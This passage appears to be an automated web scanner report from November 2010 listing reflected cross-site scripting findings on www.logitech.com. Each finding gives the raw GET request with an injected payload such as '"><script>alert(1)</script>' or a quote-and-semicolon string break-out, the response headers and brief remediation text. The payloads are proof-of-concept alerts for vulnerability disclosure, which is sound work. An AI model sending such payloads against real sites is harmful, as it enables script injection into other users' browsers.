This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c6afe"%3bb137238ef25/349/7077&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/349/7073
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a37a</script><script>alert(1)</script>1943a972a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /7a37a</script><script>alert(1)</script>1943a972a0/349/7077&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/349/7073
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:03:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce893</script><script>alert(1)</script>9ac80d9fef1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm/349ce893</script><script>alert(1)</script>9ac80d9fef1/7077&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/349/7073
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:03:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19fa6"><script>alert(1)</script>af4b1eb77e1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.cfm/34919fa6"><script>alert(1)</script>af4b1eb77e1/7077&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/349/7073
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:03:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62a5b"><script>alert(1)</script>908d8e7432a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.cfm/349/707762a5b"><script>alert(1)</script>908d8e7432a&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/349/7073
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:03:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8348</script><script>alert(1)</script>d0fde33821a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm/349/7077a8348</script><script>alert(1)</script>d0fde33821a&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/349/7073
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:03:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 764ab</script><script>alert(1)</script>8b7f3de847a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /764ab</script><script>alert(1)</script>8b7f3de847a/349/7126&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/mice-pointers
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68465"><script>alert(1)</script>62d470a5a82 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /68465"><script>alert(1)</script>62d470a5a82/349/7126&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/mice-pointers
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f20e"%3b45c1c7616f1 was submitted in the REST URL parameter 1. This input was echoed as 7f20e";45c1c7616f1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /7f20e"%3b45c1c7616f1/349/7126&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/mice-pointers
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30f2f</script><script>alert(1)</script>51a314ad24b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm/34930f2f</script><script>alert(1)</script>51a314ad24b/7126&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/mice-pointers
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:03:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d596"><script>alert(1)</script>bd979bc0b96 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.cfm/3493d596"><script>alert(1)</script>bd979bc0b96/7126&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/mice-pointers
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f34b</script><script>alert(1)</script>85b9be3c67d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm/349/71265f34b</script><script>alert(1)</script>85b9be3c67d&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/mice-pointers
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:03:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cdc5"><script>alert(1)</script>cd79028732c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.cfm/349/71268cdc5"><script>alert(1)</script>cd79028732c&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/mice-pointers
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:03:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee46e"%3b433523455d2 was submitted in the REST URL parameter 1. This input was echoed as ee46e";433523455d2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ee46e"%3b433523455d2/66/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Server: Apache AK-control: no-store Date: Fri, 12 Nov 2010 13:02:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8308c</script><script>alert(1)</script>50a5176ae89 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /8308c</script><script>alert(1)</script>50a5176ae89/66/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a658"><script>alert(1)</script>07eca558f37 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /8a658"><script>alert(1)</script>07eca558f37/66/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33bb2</script><script>alert(1)</script>b17efc55bc4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm/6633bb2</script><script>alert(1)</script>b17efc55bc4/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:03:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14819"><script>alert(1)</script>904f4c596ae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.cfm/6614819"><script>alert(1)</script>904f4c596ae/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2876"><script>alert(1)</script>da7db6e5ed2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /a2876"><script>alert(1)</script>da7db6e5ed2/66/6052&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/mice-pointers
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5949f</script><script>alert(1)</script>8faaf3f9d12 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /5949f</script><script>alert(1)</script>8faaf3f9d12/66/6052&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/mice-pointers
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1ab0"%3b23c9f0c0819 was submitted in the REST URL parameter 1. This input was echoed as a1ab0";23c9f0c0819 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a1ab0"%3b23c9f0c0819/66/6052&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/mice-pointers
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8087e</script><script>alert(1)</script>2c912cf7a89 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm/668087e</script><script>alert(1)</script>2c912cf7a89/6052&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/mice-pointers
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:03:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b564e"><script>alert(1)</script>3ab57567672 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.cfm/66b564e"><script>alert(1)</script>3ab57567672/6052&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/mice-pointers
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb5a2"><script>alert(1)</script>b3668bfde52 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.cfm/66/6052cb5a2"><script>alert(1)</script>b3668bfde52&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/mice-pointers
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:03:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e8dd</script><script>alert(1)</script>7b6250be131 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm/66/60521e8dd</script><script>alert(1)</script>7b6250be131&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/mice-pointers
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:03:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
